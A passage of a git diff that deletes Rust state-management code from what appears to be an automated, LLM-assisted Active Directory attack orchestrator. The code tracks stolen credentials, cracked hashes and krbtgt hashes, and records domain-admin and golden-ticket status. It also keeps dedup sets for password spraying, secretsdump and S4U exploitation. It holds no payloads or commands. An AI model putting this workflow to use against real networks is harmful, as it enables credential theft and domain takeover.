StateInner { - pub operation_id: String, - pub target: Option, - pub target_ips: Vec, - - // Collections (append-mostly) - pub credentials: Vec, - pub hashes: Vec, - pub hosts: Vec, - pub users: Vec, - pub shares: Vec, - pub domains: Vec, - - // Vulnerability tracking - pub discovered_vulnerabilities: HashMap, - pub exploited_vulnerabilities: HashSet, - - // Maps - pub domain_controllers: HashMap, - pub netbios_to_fqdn: HashMap, - pub domain_sids: HashMap, - /// RID-500 account name per domain (may differ from "Administrator" if renamed). - pub admin_names: HashMap, - - // Trust relationships (domain FQDN → trust metadata) - pub trusted_domains: HashMap, - - // Per-domain DA tracking: domains where krbtgt NTLM has been obtained - pub dominated_domains: HashSet, - - // Flags - pub has_domain_admin: bool, - pub has_golden_ticket: bool, - pub domain_admin_path: Option, - - // Dedup sets (persisted to Redis) - pub dedup: HashMap>, - - // MSSQL enum tracking (persisted to Redis SET) - pub mssql_enum_dispatched: HashSet, - - // ACL chain data (from BloodHound, stored in Redis LIST) - pub acl_chains: Vec, - - // ACL step dedup (tracks which chain steps have been dispatched) - pub dispatched_acl_steps: HashSet, - - // Pending/completed tasks (in-memory only) - pub pending_tasks: HashMap, - pub completed_tasks: HashMap, - - // Credential lockout quarantine: `user@domain` → expiry time. - // Credentials that triggered STATUS_ACCOUNT_LOCKED_OUT or - // KDC_ERR_CLIENT_REVOKED are quarantined to avoid burning auth budget. - pub quarantined_credentials: HashMap>, - - // Completion flag (set externally to signal operation should wrap up) - pub completed: bool, -} - -impl StateInner { - pub(super) fn new(operation_id: String) -> Self { - let mut dedup = HashMap::new(); - for name in ALL_DEDUP_SETS { - dedup.insert(name.to_string(), HashSet::new()); - } - - Self { - operation_id, - target: None, - target_ips: Vec::new(), - credentials: Vec::new(), - hashes: Vec::new(), - hosts: Vec::new(), - users: Vec::new(), - shares: Vec::new(), - domains: Vec::new(), - discovered_vulnerabilities: HashMap::new(), - exploited_vulnerabilities: HashSet::new(), - domain_controllers: HashMap::new(), - netbios_to_fqdn: HashMap::new(), - domain_sids: HashMap::new(), - admin_names: HashMap::new(), - trusted_domains: HashMap::new(), - dominated_domains: HashSet::new(), - has_domain_admin: false, - has_golden_ticket: false, - domain_admin_path: None, - dedup, - mssql_enum_dispatched: HashSet::new(), - acl_chains: Vec::new(), - dispatched_acl_steps: HashSet::new(), - pending_tasks: HashMap::new(), - completed_tasks: HashMap::new(), - quarantined_credentials: HashMap::new(), - completed: false, - } - } - - /// Check if a username is the delegating account for a constrained - /// delegation or RBCD vulnerability. These accounts must be reserved - /// for S4U exploitation — spraying or secretsdump with their creds - /// causes lockout before S4U can use them. - pub fn is_delegation_account(&self, username: &str) -> bool { - let u = username.to_lowercase(); - self.discovered_vulnerabilities.values().any(|vuln| { - let vtype = vuln.vuln_type.to_lowercase(); - if vtype != "constrained_delegation" && vtype != "rbcd" { - return false; - } - vuln.details - .get("account_name") - .or_else(|| vuln.details.get("AccountName")) - .and_then(|v| v.as_str()) - .map(|a| a.to_lowercase() == u) - .unwrap_or(false) - }) - } - - /// Check if a credential is quarantined due to lockout. - /// Expired quarantines are ignored (lazy cleanup). - pub fn is_credential_quarantined(&self, username: &str, domain: &str) -> bool { - let key = format!("{}@{}", username.to_lowercase(), domain.to_lowercase()); - self.quarantined_credentials - .get(&key) - .map(|expiry| Utc::now() < *expiry) - .unwrap_or(false) - } - - /// Quarantine a credential for `QUARANTINE_DURATION_SECS` after lockout. - pub fn quarantine_credential(&mut self, username: &str, domain: &str) { - let key = format!("{}@{}", username.to_lowercase(), domain.to_lowercase()); - let expiry = Utc::now() + chrono::Duration::seconds(QUARANTINE_DURATION_SECS); - self.quarantined_credentials.insert(key, expiry); - } - - /// Check if a dedup key exists in the named set. - pub fn is_processed(&self, set_name: &str, key: &str) -> bool { - self.dedup - .get(set_name) - .map(|s| s.contains(key)) - .unwrap_or(false) - } - - /// Check if any key in the named dedup set starts with `prefix`. - pub fn has_processed_prefix(&self, set_name: &str, prefix: &str) -> bool { - self.dedup - .get(set_name) - .map(|s| s.iter().any(|k| k.starts_with(prefix))) - .unwrap_or(false) - } - - /// Mark a key as processed in the named set. - pub fn mark_processed(&mut self, set_name: &str, key: String) { - self.dedup - .entry(set_name.to_string()) - .or_default() - .insert(key); - } -} - -#[cfg(test)] -mod tests { - use super::*; - use crate::state::*; - - #[test] - fn test_state_inner_new_initializes_all_dedup_sets() { - let state = StateInner::new("op-test".into()); - assert_eq!(state.operation_id, "op-test"); - assert!(!state.has_domain_admin); - assert!(!state.has_golden_ticket); - assert!(!state.completed); - - // All 19 dedup sets should be initialized - for name in ALL_DEDUP_SETS { - assert!(state.dedup.contains_key(*name), "Missing dedup set: {name}"); - assert!(state.dedup[*name].is_empty()); - } - assert_eq!(state.dedup.len(), ALL_DEDUP_SETS.len()); - } - - #[test] - fn test_is_processed_returns_false_for_unknown_set() { - let state = StateInner::new("op-1".into()); - assert!(!state.is_processed("nonexistent_set", "key1")); - } - - #[test] - fn test_mark_processed_and_is_processed() { - let mut state = StateInner::new("op-1".into()); - assert!(!state.is_processed(DEDUP_CRACK_REQUESTS, "hash1")); - - state.mark_processed(DEDUP_CRACK_REQUESTS, "hash1".into()); - assert!(state.is_processed(DEDUP_CRACK_REQUESTS, "hash1")); - assert!(!state.is_processed(DEDUP_CRACK_REQUESTS, "hash2")); - } - - #[test] - fn test_mark_processed_creates_new_set_if_needed() { - let mut state = StateInner::new("op-1".into()); - state.mark_processed("custom_set", "key1".into()); - assert!(state.is_processed("custom_set", "key1")); - } - - #[test] - fn test_mark_processed_idempotent() { - let mut state = StateInner::new("op-1".into()); - state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.10".into()); - state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.10".into()); - assert_eq!(state.dedup[DEDUP_SECRETSDUMP].len(), 1); - } - - #[test] - fn test_dedup_sets_are_independent() { - let mut state = StateInner::new("op-1".into()); - state.mark_processed(DEDUP_CRACK_REQUESTS, "hash1".into()); - state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.10".into()); - - assert!(state.is_processed(DEDUP_CRACK_REQUESTS, "hash1")); - assert!(!state.is_processed(DEDUP_CRACK_REQUESTS, "192.168.58.10")); - assert!(state.is_processed(DEDUP_SECRETSDUMP, "192.168.58.10")); - assert!(!state.is_processed(DEDUP_SECRETSDUMP, "hash1")); - } - - #[test] - fn test_exploited_vulnerabilities_tracking() { - let mut state = StateInner::new("op-1".into()); - assert!(state.exploited_vulnerabilities.is_empty()); - - state - .exploited_vulnerabilities - .insert("vuln-001".to_string()); - assert!(state.exploited_vulnerabilities.contains("vuln-001")); - assert!(!state.exploited_vulnerabilities.contains("vuln-002")); - } - - #[test] - fn test_mssql_enum_dispatched_tracking() { - let mut state = StateInner::new("op-1".into()); - assert!(!state.mssql_enum_dispatched.contains("192.168.58.20")); - - state - .mssql_enum_dispatched - .insert("192.168.58.20".to_string()); - assert!(state.mssql_enum_dispatched.contains("192.168.58.20")); - } - - #[test] - fn test_domain_controller_map() { - let mut state = StateInner::new("op-1".into()); - state - .domain_controllers - .insert("contoso.local".into(), "192.168.58.10".into()); - state - .domain_controllers - .insert("fabrikam.local".into(), "192.168.58.20".into()); - - assert_eq!( - state.domain_controllers.get("contoso.local"), - Some(&"192.168.58.10".to_string()) - ); - assert_eq!( - state.domain_controllers.get("fabrikam.local"), - Some(&"192.168.58.20".to_string()) - ); - assert_eq!(state.domain_controllers.get("unknown.local"), None); - } - - #[test] - fn test_all_known_dedup_set_constants() { - // Verify constants are accessible and match expected names - let expected = vec![ - DEDUP_CRACK_REQUESTS, - DEDUP_SECRETSDUMP, - DEDUP_DELEGATION_CREDS, - DEDUP_ADCS_SERVERS, - DEDUP_BLOODHOUND_DOMAINS, - DEDUP_SPIDERED_SHARES, - DEDUP_EXPANSION_CREDS, - DEDUP_ASREP_DOMAINS, - DEDUP_USERNAME_SPRAY, - DEDUP_PASSWORD_SPRAY, - DEDUP_ESC8_SERVERS, - DEDUP_COERCED_DCS, - DEDUP_WRITABLE_SHARES, - DEDUP_HASH_LATERAL, - DEDUP_SCANNED_TARGETS, - DEDUP_ACL_STEPS, - DEDUP_TRUST_FOLLOW, - DEDUP_S4U_EXPLOITS, - DEDUP_GMSA_ACCOUNTS, - DEDUP_LOW_HANGING, - DEDUP_CRED_SECRETSDUMP, - DEDUP_SHARE_ENUM, - ]; - assert_eq!(expected.len(), ALL_DEDUP_SETS.len()); - for name in expected { - assert!( - ALL_DEDUP_SETS.contains(&name), - "Missing from ALL_DEDUP_SETS: {name}" - ); - } - } - - #[test] - fn test_is_delegation_account() { - let mut state = StateInner::new("op-1".into()); - assert!(!state.is_delegation_account("john.smith")); - - // Add a constrained delegation vuln for john.smith - let mut details = std::collections::HashMap::new(); - details.insert("account_name".to_string(), serde_json::json!("john.smith")); - state.discovered_vulnerabilities.insert( - "constrained_delegation_john.smith".into(), - ares_core::models::VulnerabilityInfo { - vuln_id: "constrained_delegation_john.smith".into(), - vuln_type: "constrained_delegation".into(), - target: "".into(), - discovered_by: "".into(), - discovered_at: chrono::Utc::now(), - details, - recommended_agent: "".into(), - priority: 8, - }, - ); - - assert!(state.is_delegation_account("john.smith")); - assert!(state.is_delegation_account("John.Smith")); // case insensitive - assert!(!state.is_delegation_account("sam.wilson")); - } - - #[test] - fn test_credential_quarantine() { - let mut state = StateInner::new("op-1".into()); - - // Not quarantined initially - assert!(!state.is_credential_quarantined("jdoe", "child.contoso.local")); - - // Quarantine a credential - state.quarantine_credential("jdoe", "child.contoso.local"); - assert!(state.is_credential_quarantined("jdoe", "child.contoso.local")); - assert!(state.is_credential_quarantined("JDOE", "CHILD.CONTOSO.LOCAL")); // case insensitive - - // Different credential not affected - assert!(!state.is_credential_quarantined("john.smith", "child.contoso.local")); - } - - #[test] - fn test_credential_quarantine_expired() { - let mut state = StateInner::new("op-1".into()); - - // Insert with an already-expired time - let key = "jdoe@child.contoso.local".to_string(); - state - .quarantined_credentials - .insert(key, Utc::now() - chrono::Duration::seconds(1)); - - // Should not be quarantined (expired) - assert!(!state.is_credential_quarantined("jdoe", "child.contoso.local")); - } -} diff --git a/ares-orchestrator/src/state/mod.rs b/ares-orchestrator/src/state/mod.rs deleted file mode 100644 index 1fedb6bc..00000000 --- a/ares-orchestrator/src/state/mod.rs +++ /dev/null @@ -1,75 +0,0 @@ -//! In-memory shared state synced with Redis. -//! -//! `SharedState` wraps the operation state in `Arc>` so that all -//! background automation tasks can read state concurrently, and writes -//! (credential publishing, result processing) are serialized. -//! -//! State is loaded from Redis at startup and updated incrementally as results -//! arrive. Dedup sets are persisted to Redis so they survive orchestrator restarts. - -mod dedup; -mod inner; -mod persistence; -mod publishing; -mod shared; - -// Re-export everything that was publicly visible from the old single file. -pub use shared::SharedState; - -// --------------------------------------------------------------------------- -// Dedup set names (match Python `ares:op:{op_id}:dedup:{name}`) -// --------------------------------------------------------------------------- - -pub const DEDUP_CRACK_REQUESTS: &str = "crack_requests"; -pub const DEDUP_SECRETSDUMP: &str = "secretsdump"; -pub const DEDUP_DELEGATION_CREDS: &str = "delegation_creds"; -pub const DEDUP_ADCS_SERVERS: &str = "adcs_servers"; -pub const DEDUP_BLOODHOUND_DOMAINS: &str = "bloodhound_domains"; -pub const DEDUP_SPIDERED_SHARES: &str = "spidered_shares"; -pub const DEDUP_EXPANSION_CREDS: &str = "expansion_creds"; -pub const DEDUP_ASREP_DOMAINS: &str = "asrep_domains"; -pub const DEDUP_USERNAME_SPRAY: &str = "username_spray"; -pub const DEDUP_PASSWORD_SPRAY: &str = "password_spray"; -pub const DEDUP_ESC8_SERVERS: &str = "esc8_servers"; -pub const DEDUP_COERCED_DCS: &str = "coerced_dcs"; -pub const DEDUP_WRITABLE_SHARES: &str = "writable_shares"; -pub const DEDUP_HASH_LATERAL: &str = "hash_lateral"; -pub const DEDUP_SCANNED_TARGETS: &str = "scanned_targets"; -pub const DEDUP_ACL_STEPS: &str = "acl_steps"; -pub const DEDUP_TRUST_FOLLOW: &str = "trust_follow"; -pub const DEDUP_S4U_EXPLOITS: &str = "s4u_exploits"; -pub const DEDUP_GMSA_ACCOUNTS: &str = "gmsa_accounts"; -pub const DEDUP_LOW_HANGING: &str = "low_hanging"; -pub const DEDUP_CRED_SECRETSDUMP: &str = "cred_secretsdump"; -pub const DEDUP_SHARE_ENUM: &str = "share_enum"; - -/// Vuln queue ZSET key suffix. -pub const KEY_VULN_QUEUE: &str = "vuln_queue"; - -/// Discovery list key prefix (NOT under ares:op:). -pub const DISCOVERY_KEY_PREFIX: &str = "ares:discoveries"; - -const ALL_DEDUP_SETS: &[&str] = &[ - DEDUP_CRACK_REQUESTS, - DEDUP_SECRETSDUMP, - DEDUP_DELEGATION_CREDS, - DEDUP_ADCS_SERVERS, - DEDUP_BLOODHOUND_DOMAINS, - DEDUP_SPIDERED_SHARES, - DEDUP_EXPANSION_CREDS, - DEDUP_ASREP_DOMAINS, - DEDUP_USERNAME_SPRAY, - DEDUP_PASSWORD_SPRAY, - DEDUP_ESC8_SERVERS, - DEDUP_COERCED_DCS, - DEDUP_WRITABLE_SHARES, - DEDUP_HASH_LATERAL, - DEDUP_SCANNED_TARGETS, - DEDUP_ACL_STEPS, - DEDUP_TRUST_FOLLOW, - DEDUP_S4U_EXPLOITS, - DEDUP_SHARE_ENUM, - DEDUP_GMSA_ACCOUNTS, - DEDUP_LOW_HANGING, - DEDUP_CRED_SECRETSDUMP, -]; diff --git a/ares-orchestrator/src/state/persistence.rs b/ares-orchestrator/src/state/persistence.rs deleted file mode 100644 index 90363db3..00000000 --- a/ares-orchestrator/src/state/persistence.rs +++ /dev/null @@ -1,330 +0,0 @@ -//! Redis persistence — load_from_redis & refresh_from_redis. - -use std::collections::{HashMap, HashSet}; - -use anyhow::{Context, Result}; -use redis::AsyncCommands; -use tracing::{debug, info}; - -use ares_core::state::{self, RedisStateReader}; - -use super::{SharedState, ALL_DEDUP_SETS, DEDUP_ACL_STEPS}; -use crate::task_queue::TaskQueue; - -impl SharedState { - /// Load state from Redis (called at startup). - pub async fn load_from_redis(&self, queue: &TaskQueue) -> Result<()> { - let mut conn = queue.connection(); - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - - let reader = RedisStateReader::new(operation_id.clone()); - - // Load collections - let loaded = reader - .load_state(&mut conn) - .await - .context("Failed to load state from Redis")?; - - let loaded = match loaded { - Some(s) => s, - None => { - info!(operation_id = %operation_id, "No existing state in Redis — starting fresh"); - return Ok(()); - } - }; - - // Load dedup sets - let mut dedup_sets: HashMap> = HashMap::new(); - for set_name in ALL_DEDUP_SETS { - let key = format!( - "{}:{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_DEDUP_PREFIX, - set_name - ); - let members: HashSet = conn.smembers(&key).await.unwrap_or_default(); - if !members.is_empty() { - debug!(set = set_name, count = members.len(), "Loaded dedup set"); - } - dedup_sets.insert(set_name.to_string(), members); - } - - // Load MSSQL enum dispatched - let mssql_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_MSSQL_ENUM_DISPATCHED - ); - let mssql_dispatched: HashSet = conn.smembers(&mssql_key).await.unwrap_or_default(); - - // Load domain SIDs - let domain_sids_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_DOMAIN_SIDS - ); - let domain_sids: HashMap = - conn.hgetall(&domain_sids_key).await.unwrap_or_default(); - - // Load RID-500 admin account names - let admin_names_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_ADMIN_NAMES - ); - let admin_names: HashMap = - conn.hgetall(&admin_names_key).await.unwrap_or_default(); - - // Load trusted domains - let trusted_domains_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_TRUSTED_DOMAINS - ); - let raw_trusts: HashMap = - conn.hgetall(&trusted_domains_key).await.unwrap_or_default(); - let mut trusted_domains = HashMap::new(); - for (domain, json_str) in &raw_trusts { - if let Ok(trust) = serde_json::from_str::(json_str) { - trusted_domains.insert(domain.clone(), trust); - } - } - - // Load ACL chains - let acl_chains_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_ACL_CHAINS - ); - let acl_chains_raw: Vec = conn - .lrange(&acl_chains_key, 0, -1) - .await - .unwrap_or_default(); - let acl_chains: Vec = acl_chains_raw - .iter() - .filter_map(|s| serde_json::from_str(s).ok()) - .collect(); - - // Load pending tasks from Redis HASH - let pending_tasks_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_PENDING_TASKS - ); - let raw_pending: std::collections::HashMap = - conn.hgetall(&pending_tasks_key).await.unwrap_or_default(); - let mut pending_tasks = std::collections::HashMap::new(); - for (task_id, json_str) in &raw_pending { - if let Ok(task_info) = serde_json::from_str::(json_str) { - pending_tasks.insert(task_id.clone(), task_info); - } - } - - // Load completed tasks from Redis HASH - let completed_tasks_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_COMPLETED_TASKS - ); - let raw_completed: std::collections::HashMap = - conn.hgetall(&completed_tasks_key).await.unwrap_or_default(); - let mut completed_tasks = std::collections::HashMap::new(); - for (task_id, json_str) in &raw_completed { - if let Ok(task_result) = serde_json::from_str::(json_str) - { - completed_tasks.insert(task_id.clone(), task_result); - } - } - - // Load dispatched ACL steps from dedup set - let acl_dedup_key = format!( - "{}:{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_DEDUP_PREFIX, - DEDUP_ACL_STEPS - ); - let dispatched_acl_steps: HashSet = - conn.smembers(&acl_dedup_key).await.unwrap_or_default(); - - // Apply to state - let mut state = self.inner.write().await; - state.target = loaded.target; - state.target_ips = loaded.target_ips; - state.credentials = loaded.all_credentials; - state.hashes = loaded.all_hashes; - state.hosts = loaded.all_hosts; - state.users = loaded.all_users; - state.shares = loaded.all_shares; - state.domains = loaded.all_domains; - state.discovered_vulnerabilities = loaded.discovered_vulnerabilities; - state.exploited_vulnerabilities = loaded.exploited_vulnerabilities; - state.domain_controllers = loaded.domain_controllers; - state.netbios_to_fqdn = loaded.netbios_to_fqdn; - state.domain_sids = domain_sids; - state.admin_names = admin_names; - state.trusted_domains = trusted_domains; - // Rebuild dominated_domains from krbtgt hashes - state.dominated_domains = state - .hashes - .iter() - .filter(|h| { - h.username.to_lowercase() == "krbtgt" && h.hash_type.to_lowercase().contains("ntlm") - }) - .map(|h| { - if h.domain.is_empty() { - state.domains.first().cloned().unwrap_or_default() - } else { - h.domain.to_lowercase() - } - }) - .filter(|d| !d.is_empty()) - .collect(); - state.has_domain_admin = loaded.has_domain_admin; - state.has_golden_ticket = loaded.has_golden_ticket; - state.domain_admin_path = loaded.domain_admin_path; - state.dedup = dedup_sets; - state.mssql_enum_dispatched = mssql_dispatched; - state.acl_chains = acl_chains; - state.dispatched_acl_steps = dispatched_acl_steps; - state.pending_tasks = pending_tasks; - state.completed_tasks = completed_tasks; - - let cred_count = state.credentials.len(); - let hash_count = state.hashes.len(); - let host_count = state.hosts.len(); - let vuln_count = state.discovered_vulnerabilities.len(); - drop(state); - - info!( - operation_id = %operation_id, - credentials = cred_count, - hashes = hash_count, - hosts = host_count, - vulnerabilities = vuln_count, - "State loaded from Redis" - ); - - Ok(()) - } - - /// Refresh state from Redis (periodic sync). - pub async fn refresh_from_redis(&self, queue: &TaskQueue) -> Result<()> { - let mut conn = queue.connection(); - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let reader = RedisStateReader::new(operation_id.clone()); - - let credentials = reader.get_credentials(&mut conn).await.unwrap_or_default(); - let hashes = reader.get_hashes(&mut conn).await.unwrap_or_default(); - let hosts = reader.get_hosts(&mut conn).await.unwrap_or_default(); - let vulns = reader - .get_vulnerabilities(&mut conn) - .await - .unwrap_or_default(); - let exploited = reader - .get_exploited_vulnerabilities(&mut conn) - .await - .unwrap_or_default(); - let meta = reader.get_meta(&mut conn).await.unwrap_or_default(); - let dc_map = reader.get_dc_map(&mut conn).await.unwrap_or_default(); - - // Load domain SIDs - let domain_sids_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_DOMAIN_SIDS - ); - let domain_sids: HashMap = - conn.hgetall(&domain_sids_key).await.unwrap_or_default(); - - // Load RID-500 admin account names - let admin_names_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_ADMIN_NAMES - ); - let admin_names: HashMap = - conn.hgetall(&admin_names_key).await.unwrap_or_default(); - - // Refresh ACL chains - let acl_chains_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_ACL_CHAINS - ); - let acl_chains_raw: Vec = conn - .lrange(&acl_chains_key, 0, -1) - .await - .unwrap_or_default(); - let acl_chains: Vec = acl_chains_raw - .iter() - .filter_map(|s| serde_json::from_str(s).ok()) - .collect(); - - // Refresh trusted domains - let trusted_domains_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_TRUSTED_DOMAINS - ); - let raw_trusts: HashMap = - conn.hgetall(&trusted_domains_key).await.unwrap_or_default(); - let mut trusted_domains = HashMap::new(); - for (domain, json_str) in &raw_trusts { - if let Ok(trust) = serde_json::from_str::(json_str) { - trusted_domains.insert(domain.clone(), trust); - } - } - - let mut state = self.inner.write().await; - state.credentials = credentials; - state.hashes = hashes; - state.hosts = hosts; - state.discovered_vulnerabilities = vulns; - state.exploited_vulnerabilities = exploited; - state.has_domain_admin = meta.has_domain_admin; - state.has_golden_ticket = meta.has_golden_ticket; - state.domain_admin_path = meta.domain_admin_path; - state.domain_controllers = dc_map; - state.domain_sids = domain_sids; - state.admin_names = admin_names; - state.trusted_domains = trusted_domains; - state.acl_chains = acl_chains; - // Rebuild dominated_domains from refreshed hashes - state.dominated_domains = state - .hashes - .iter() - .filter(|h| { - h.username.to_lowercase() == "krbtgt" && h.hash_type.to_lowercase().contains("ntlm") - }) - .map(|h| { - if h.domain.is_empty() { - state.domains.first().cloned().unwrap_or_default() - } else { - h.domain.to_lowercase() - } - }) - .filter(|d| !d.is_empty()) - .collect(); - - Ok(()) - } -} diff --git a/ares-orchestrator/src/state/publishing/credentials.rs b/ares-orchestrator/src/state/publishing/credentials.rs deleted file mode 100644 index 53cc8ce2..00000000 --- a/ares-orchestrator/src/state/publishing/credentials.rs +++ /dev/null @@ -1,221 +0,0 @@ -//! Credential and hash publishing methods. - -use anyhow::Result; - -use ares_core::models::{Credential, Hash}; -use ares_core::state::{self, RedisStateReader}; - -use crate::state::SharedState; -use crate::task_queue::TaskQueue; - -use super::sanitize_credential; - -impl SharedState { - /// Add a credential to state and Redis (with dedup). - /// - /// Sanitizes the credential before storage (strips "Password:" prefix, trailing - /// metadata, normalizes domains, rejects noise). When the credential's domain is - /// a valid FQDN (contains a dot), it is automatically added to `state.domains` - /// (matches Python's `add_credential()` behavior). - pub async fn publish_credential(&self, queue: &TaskQueue, cred: Credential) -> Result { - // Sanitize and validate before storage - let netbios_map = { - let state = self.inner.read().await; - state.netbios_to_fqdn.clone() - }; - let cred = match sanitize_credential(cred, &netbios_map) { - Some(c) => c, - None => return Ok(false), - }; - - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let reader = RedisStateReader::new(operation_id.clone()); - let mut conn = queue.connection(); - let added = reader.add_credential(&mut conn, &cred).await?; - if added { - // Auto-extract domain from credential (matches Python add_credential) - let cred_domain = cred.domain.to_lowercase(); - if cred_domain.contains('.') { - let mut state = self.inner.write().await; - if !state.domains.contains(&cred_domain) { - state.domains.push(cred_domain.clone()); - let domain_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_DOMAINS, - ); - let _: Result<(), _> = - redis::AsyncCommands::sadd(&mut conn, &domain_key, &cred_domain).await; - let _: Result<(), _> = - redis::AsyncCommands::expire(&mut conn, &domain_key, 86400i64).await; - tracing::info!( - domain = %cred_domain, - username = %cred.username, - "Auto-extracted domain from credential" - ); - } - state.credentials.push(cred); - } else { - let mut state = self.inner.write().await; - state.credentials.push(cred); - } - } - Ok(added) - } - - /// Add a hash to state and Redis (with dedup). - /// - /// When a `krbtgt` NTLM hash is stored, `has_domain_admin` is automatically - /// set — mirroring Python's `add_hash()` behaviour so that `auto_golden_ticket` - /// triggers without requiring the LLM to emit a structured JSON payload. - pub async fn publish_hash(&self, queue: &TaskQueue, hash: Hash) -> Result { - use ares_core::models::VulnerabilityInfo; - use std::collections::HashMap; - - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let reader = RedisStateReader::new(operation_id); - let mut conn = queue.connection(); - let added = reader.add_hash(&mut conn, &hash).await?; - if added { - let is_krbtgt = hash.username.to_lowercase() == "krbtgt" - && hash.hash_type.to_lowercase().contains("ntlm"); - let hash_domain = hash.domain.clone(); - let mut state = self.inner.write().await; - state.hashes.push(hash); - - // Track per-domain domination when krbtgt NTLM hash arrives - if is_krbtgt { - let krbtgt_domain = if hash_domain.is_empty() { - state.domains.first().cloned().unwrap_or_default() - } else { - hash_domain.to_lowercase() - }; - if !krbtgt_domain.is_empty() { - state.dominated_domains.insert(krbtgt_domain.clone()); - tracing::info!(domain = %krbtgt_domain, "Domain dominated (krbtgt hash obtained)"); - } - - // Resolve DC target IP for vulnerability entry - let dc_target = state - .domain_controllers - .get(&krbtgt_domain) - .cloned() - .unwrap_or_else(|| krbtgt_domain.clone()); - - // Auto-set domain admin when first krbtgt NTLM hash arrives (matches Python) - if !state.has_domain_admin { - drop(state); - let path = Some("secretsdump → krbtgt NTLM hash".to_string()); - if let Err(e) = self.set_domain_admin(queue, path).await { - tracing::warn!(err = %e, "Failed to auto-set domain admin from krbtgt hash"); - } else { - tracing::info!( - "🎯 Domain Admin auto-set from krbtgt NTLM hash in publish_hash" - ); - } - } else { - drop(state); - } - - // Synthesize a dc_secretsdump vulnerability so the discovered - // vulnerabilities list reflects the DA achievement path. - let vuln_id = format!("dc_secretsdump_{}", krbtgt_domain); - let mut details = HashMap::new(); - details.insert( - "domain".into(), - serde_json::Value::String(krbtgt_domain.clone()), - ); - details.insert( - "note".into(), - serde_json::Value::String( - "Domain controller compromised via secretsdump — krbtgt NTLM hash extracted" - .to_string(), - ), - ); - let vuln = VulnerabilityInfo { - vuln_id: vuln_id.clone(), - vuln_type: "dc_secretsdump".to_string(), - target: dc_target, - discovered_by: "credential_access".to_string(), - discovered_at: chrono::Utc::now(), - details, - recommended_agent: String::new(), - priority: 1, - }; - let _ = self.publish_vulnerability(queue, vuln).await; - let _ = self.mark_exploited(queue, &vuln_id).await; - } - } - Ok(added) - } - - /// Update a hash's `cracked_password` field in memory and Redis. - /// - /// Finds the first hash matching the given username and domain (case-insensitive) - /// that has no cracked password yet, sets it, and persists the change to the Redis - /// HASH by scanning fields and updating the matching entry. - pub async fn update_hash_cracked_password( - &self, - queue: &TaskQueue, - username: &str, - domain: &str, - password: &str, - ) -> Result { - // Update in-memory state and capture the updated hash for Redis persist - let (op_id, hash_type) = { - let mut state = self.inner.write().await; - let idx = state.hashes.iter().position(|h| { - h.username.eq_ignore_ascii_case(username) - && h.domain.eq_ignore_ascii_case(domain) - && h.cracked_password.is_none() - }); - match idx { - Some(i) => { - state.hashes[i].cracked_password = Some(password.to_string()); - let ht = state.hashes[i].hash_type.clone(); - (state.operation_id.clone(), ht) - } - None => return Ok(false), - } - }; - - // Persist to Redis HASH: scan fields, find the matching entry, update it - let hash_key = format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_HASHES,); - let mut conn = queue.connection(); - let entries: std::collections::HashMap = - redis::AsyncCommands::hgetall(&mut conn, &hash_key) - .await - .unwrap_or_default(); - for (field, value) in &entries { - if let Ok(mut h) = serde_json::from_str::(value) { - if h.username.eq_ignore_ascii_case(username) - && h.domain.eq_ignore_ascii_case(domain) - && h.cracked_password.is_none() - { - h.cracked_password = Some(password.to_string()); - let updated_json = serde_json::to_string(&h).unwrap_or_default(); - let _: Result<(), _> = - redis::AsyncCommands::hset(&mut conn, &hash_key, field, &updated_json) - .await; - break; - } - } - } - - tracing::info!( - username = %username, - domain = %domain, - hash_type = %hash_type, - "Hash cracked_password updated in state and Redis" - ); - - Ok(true) - } -} diff --git a/ares-orchestrator/src/state/publishing/entities.rs b/ares-orchestrator/src/state/publishing/entities.rs deleted file mode 100644 index 6c071b8a..00000000 --- a/ares-orchestrator/src/state/publishing/entities.rs +++ /dev/null @@ -1,252 +0,0 @@ -//! Entity publishing: users, vulnerabilities, shares, timeline, tasks, netbios, trusts. - -use anyhow::Result; -use redis::AsyncCommands; - -use ares_core::models::{Share, User, VulnerabilityInfo}; -use ares_core::state::{self, RedisStateReader}; - -use crate::state::{SharedState, KEY_VULN_QUEUE}; -use crate::task_queue::TaskQueue; - -impl SharedState { - /// Add a user to state and Redis (with dedup). - pub async fn publish_user(&self, queue: &TaskQueue, user: User) -> Result { - // Check for duplicate in memory - { - let state = self.inner.read().await; - let dedup = format!( - "{}@{}", - user.username.to_lowercase(), - user.domain.to_lowercase() - ); - if state.users.iter().any(|u| { - format!("{}@{}", u.username.to_lowercase(), u.domain.to_lowercase()) == dedup - }) { - return Ok(false); - } - } - - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let reader = RedisStateReader::new(operation_id); - let mut conn = queue.connection(); - let added = reader.add_user(&mut conn, &user).await?; - if added { - let mut state = self.inner.write().await; - state.users.push(user); - } - Ok(added) - } - - /// Add a vulnerability to state and Redis. - pub async fn publish_vulnerability( - &self, - queue: &TaskQueue, - vuln: VulnerabilityInfo, - ) -> Result { - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let reader = RedisStateReader::new(operation_id.clone()); - let mut conn = 